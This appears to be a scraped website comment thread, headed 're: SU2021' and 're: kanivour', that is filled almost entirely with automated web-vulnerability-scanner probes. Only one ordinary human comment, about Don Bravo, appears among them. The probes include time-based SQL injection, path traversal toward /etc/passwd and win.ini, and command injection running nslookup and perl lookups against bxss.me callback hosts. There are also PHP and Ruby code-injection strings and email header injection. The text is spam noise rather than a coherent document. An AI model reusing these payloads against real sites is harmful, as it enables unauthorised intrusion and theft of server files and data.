.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: SU2021
WEB-INF/web.xml
re: SU2021
WEB-INF\web.xml
re: SU2021
1
re: SU2021
1
re: SU2021
-1 OR 2+403-403-1=0+0+0+1 --
re: SU2021
-1 OR 3+403-403-1=0+0+0+1 --
re: SU2021
-1 OR 2+546-546-1=0+0+0+1
re: SU2021
-1 OR 3+546-546-1=0+0+0+1
re: SU2021
-1' OR 2+402-402-1=0+0+0+1 --
re: SU2021
-1' OR 3+402-402-1=0+0+0+1 --
re: SU2021
-1' OR 2+496-496-1=0+0+0+1 or 'nLErkXam'='
re: SU2021
-1' OR 3+496-496-1=0+0+0+1 or 'nLErkXam'='
re: SU2021
-1" OR 2+597-597-1=0+0+0+1 --
re: SU2021
-1" OR 3+597-597-1=0+0+0+1 --
re: SU2021
if(now()=sysdate(),sleep(15),0)
re: SU2021
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: SU2021
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: SU2021
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: SU2021
-1; waitfor delay '0:0:15' --
re: SU2021
-1); waitfor delay '0:0:15' --
re: SU2021
1 waitfor delay '0:0:15' --
re: SU2021
L76S1jvu'; waitfor delay '0:0:15' --
re: SU2021
-5 OR 540=(SELECT 540 FROM PG_SLEEP(15))--
re: SU2021
-5) OR 366=(SELECT 366 FROM PG_SLEEP(15))--
re: SU2021
-1)) OR 493=(SELECT 493 FROM PG_SLEEP(15))--
re: SU2021
AoyQpMmf' OR 760=(SELECT 760 FROM PG_SLEEP(15))--
re: SU2021
koDEie4V') OR 754=(SELECT 754 FROM PG_SLEEP(15))--
re: SU2021
xA4HKk4Y')) OR 21=(SELECT 21 FROM PG_SLEEP(15))--
re: SU2021
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: SU2021
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: SU2021
'||(select 1 from (select pg_sleep(15))x)||'
re: SU2021
''||(select 1 from (select pg_sleep(15))x)||''
re: SU2021
1'"
re: SU2021
@@CYiiT
Heard good things about Don Bravo but have not visited.
re: kanivour
YLlwSTRc
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
-1 OR 2+818-818-1=0+0+0+1
re: kanivour
-1 OR 3+818-818-1=0+0+0+1
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kanivour
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kanivour
-1; waitfor delay '0:0:15' --
re: kanivour
-1); waitfor delay '0:0:15' --
re: kanivour
C49OHkAF
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
1*
re: kanivour
-1 OR 2+617-617-1=0+0+0+1
re: kanivour
-1 OR 3+617-617-1=0+0+0+1
re: kanivour
1 waitfor delay '0:0:15' --
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
7xBBoKAM'; waitfor delay '0:0:15' --
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
-5 OR 723=(SELECT 723 FROM PG_SLEEP(15))--
re: kanivour
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kanivour
-5) OR 418=(SELECT 418 FROM PG_SLEEP(15))--
re: kanivour
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kanivour
-1)) OR 141=(SELECT 141 FROM PG_SLEEP(15))--
re: kanivour
-1; waitfor delay '0:0:15' --
re: kanivour
imnT4O7a' OR 109=(SELECT 109 FROM PG_SLEEP(15))--
re: kanivour
-1); waitfor delay '0:0:15' --
re: kanivour
QdlqAi3f') OR 340=(SELECT 340 FROM PG_SLEEP(15))--
re: kanivour
1 waitfor delay '0:0:15' --
re: kanivour
ZoB0DpO2')) OR 942=(SELECT 942 FROM PG_SLEEP(15))--
re: kanivour
1ePoELdi'; waitfor delay '0:0:15' --
re: kanivour
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kanivour
-5 OR 529=(SELECT 529 FROM PG_SLEEP(15))--
re: kanivour
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kanivour
-5) OR 559=(SELECT 559 FROM PG_SLEEP(15))--
re: kanivour
'||(select 1 from (select pg_sleep(15))x)||'
re: kanivour
-1)) OR 645=(SELECT 645 FROM PG_SLEEP(15))--
re: kanivour
''||(select 1 from (select pg_sleep(15))x)||''
re: kanivour
1'"
re: kanivour
@@XsvD5
re: kanivour
PxGcOWZ9' OR 864=(SELECT 864 FROM PG_SLEEP(15))--
re: kanivour
LVDZwyJM') OR 987=(SELECT 987 FROM PG_SLEEP(15))--
re: kanivour
4VXFqQdU')) OR 769=(SELECT 769 FROM PG_SLEEP(15))--
re: kanivour
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kanivour
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kanivour
'||(select 1 from (select pg_sleep(15))x)||'
re: kanivour
''||(select 1 from (select pg_sleep(15))x)||''
re: kanivour
1'"
re: kanivour
@@97PJU
re: kanivour
1EIkYB7LO
re: kanivour
response.write(9317881*9850607)
re: kanivour
'+response.write(9317881*9850607)+'
re: kanivour
"+response.write(9317881*9850607)+"
re: kanivour
%0abcc:074625.67-16278.67.6ed80.19990.2@bxss.me
re: kanivour
to@example.com>%0d%0abcc:074625.67-16279.67.6ed80.19990.2@bxss.me
re: kanivour
<esi:include src="http://bxss.me/rpb.png"/>
re: kanivour
${9999217+9999351}
re: kanivour
../../../../../../../../../../../../../../etc/passwd
re: kanivour
../../../../../../../../../../../../../../windows/win.ini
re: kanivour
file:///etc/passwd
re: kanivour
../../../../../../../../../../../../../../../proc/version
re: kanivour
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: kanivour
../../../../../../../../../../etc/passwd%00.jpg
re: kanivour
)
re: kanivour
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: kanivour
echo xtcokc$()\ hacjal\nz^xyu||a #' &echo xtcokc$()\ hacjal\nz^xyu||a #|" &echo xtcokc$()\ hacjal\nz^xyu||a #
re: kanivour
!(()&&!|*|*|
re: kanivour
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: kanivour
&echo szpvzq$()\ zkxwwy\nz^xyu||a #' &echo szpvzq$()\ zkxwwy\nz^xyu||a #|" &echo szpvzq$()\ zkxwwy\nz^xyu||a #
re: kanivour
^(#$!@#$)(()))******
re: kanivour
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: kanivour
|echo ztsfav$()\ acjiak\nz^xyu||a #' |echo ztsfav$()\ acjiak\nz^xyu||a #|" |echo ztsfav$()\ acjiak\nz^xyu||a #
re: kanivour
/etc/passwd
re: kanivour
(nslookup hitinftzmqolkac663.bxss.me||perl -e "gethostbyname('hitinftzmqolkac663.bxss.me')")
re: kanivour
%2fetc%2fpasswd
re: kanivour
$(nslookup hithejsaegeyw17176.bxss.me||perl -e "gethostbyname('hithejsaegeyw17176.bxss.me')")
re: kanivour
/.././.././.././.././.././.././.././../etc/./passwd%00
re: kanivour
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: kanivour
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: kanivour
'.gethostbyname(lc('hitnm'.'afkdpsqs82547.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(90).chr(117).chr(77).'
re: kanivour
&nslookup hitzwassxmoftea175.bxss.me&'\"`0&nslookup hitzwassxmoftea175.bxss.me&`'
re: kanivour
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: kanivour
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: kanivour
".gethostbyname(lc("hitij"."xkjwxnvb2878b.bxss.me."))."A".chr(67).chr(hex("58")).chr(115).chr(70).chr(103).chr(68)."
re: kanivour
&(nslookup hitznezifqdzi0f639.bxss.me||perl -e "gethostbyname('hitznezifqdzi0f639.bxss.me')")&'\"`0&(nslookup hitznezifqdzi0f639.bxss.me||perl -e "gethostbyname('hitznezifqdzi0f639.bxss.me')")&`'
re: kanivour
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: kanivour
Http://bxss.me/t/fit.txt
re: kanivour
|(nslookup hitjervqhrufh1e672.bxss.me||perl -e "gethostbyname('hitjervqhrufh1e672.bxss.me')")
re: kanivour
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: kanivour
http://bxss.me/t/fit.txt%3F.jpg
re: kanivour
`(nslookup hitdeurrakbyhb5948.bxss.me||perl -e "gethostbyname('hitdeurrakbyhb5948.bxss.me')")`
re: kanivour
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: kanivour
;(nslookup hithesjzkwwwoc1fe7.bxss.me||perl -e "gethostbyname('hithesjzkwwwoc1fe7.bxss.me')")|(nslookup hithesjzkwwwoc1fe7.bxss.me||perl -e "gethostbyname('hithesjzkwwwoc1fe7.bxss.me')")&(nslookup hithesjzkwwwoc1fe7.bxss.me||perl -e "gethostbyname('hithesjzkwwwoc1fe7.bxss.me')")
re: kanivour
/etc/shells
re: kanivour
file:///etc/passwd
re: kanivour
c:/windows/win.ini
re: kanivour
/\../\../\../\../\../\../\../etc/passwd
re: kanivour
bxss.me
re: kanivour
HttP://bxss.me/t/xss.html?%00
re: kanivour
/WEB-INF/web.xml
re: kanivour
bxss.me/t/xss.html?%00
re: kanivour
"+"A".concat(70-3).concat(22*4).concat(120).concat(89).concat(118).concat(88)+(require"socket"
Socket.gethostbyname("hitic"+"xktzirkjfe449.bxss.me.")[3].to_s)+"
re: kanivour
C:\WINDOWS\system32\drivers\etc\hosts
re: kanivour
'+'A'.concat(70-3).concat(22*4).concat(122).concat(72).concat(100).concat(78)+(require'socket'
Socket.gethostbyname('hityy'+'awczjzxz247a2.bxss.me.')[3].to_s)+'
re: kanivour
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: kanivour
../../../../../../../../../../windows/win.ini%00.jpg
re: kanivour
/../../../../../../../../../../boot.ini
re: kanivour
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: kanivour
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: kanivour
'"
re: kanivour
..\..\..\..\..\..\..\..\windows\win.ini
re: kanivour
';print(md5(31337));$a='
re: kanivour
<!--
re: kanivour
";print(md5(31337));$a="
re: kanivour
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: kanivour
${@print(md5(31337))}
re: kanivour
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: kanivour
${@print(md5(31337))}\
re: kanivour
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: kanivour
'.print(md5(31337)).'
re: kanivour
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: kanivour
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: kanivour
WEB-INF/web.xml
re: kanivour
WEB-INF\web.xml
re: kanivour
1
re: kanivour
1
re: kanivour
-1 OR 2+620-620-1=0+0+0+1 --
re: kanivour
-1 OR 3+620-620-1=0+0+0+1 --
re: kanivour
-1 OR 2+659-659-1=0+0+0+1
re: kanivour
-1 OR 3+659-659-1=0+0+0+1
re: kanivour
-1' OR 2+759-759-1=0+0+0+1 --
re: kanivour
-1' OR 3+759-759-1=0+0+0+1 --
re: kanivour
-1' OR 2+32-32-1=0+0+0+1 or '211fvhoa'='
re: kanivour
-1' OR 3+32-32-1=0+0+0+1 or '211fvhoa'='
re: kanivour
-1" OR 2+586-586-1=0+0+0+1 --
re: kanivour
-1" OR 3+586-586-1=0+0+0+1 --
re: kanivour
if(now()=sysdate(),sleep(15),0)
re: kanivour
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: kanivour
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: kanivour
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: kanivour
-1; waitfor delay '0:0:15' --
re: kanivour
-1); waitfor delay '0:0:15' --
re: kanivour
1 waitfor delay '0:0:15' --
re: kanivour
1BTcvKsb'; waitfor delay '0:0:15' --
re: kanivour
-5 OR 791=(SELECT 791 FROM PG_SLEEP(15))--
re: kanivour
-5) OR 900=(SELECT 900 FROM PG_SLEEP(15))--
re: kanivour
-1)) OR 555=(SELECT 555 FROM PG_SLEEP(15))--
re: kanivour
Rru5DRmO' OR 324=(SELECT 324 FROM PG_SLEEP(15))--
re: kanivour
9E3cRan1') OR 75=(SELECT 75 FROM PG_SLEEP(15))--
re: kanivour
SSOSpv6M')) OR 292=(SELECT 292 FROM PG_SLEEP(15))--
re: kanivour
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: kanivour
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: kanivour
'||(select 1 from (select pg_sleep(15))x)||'
re: kanivour
''||(select 1 from (select pg_sleep(15))x)||''
re: kanivour
1'"
re: kanivour
@@UAwbr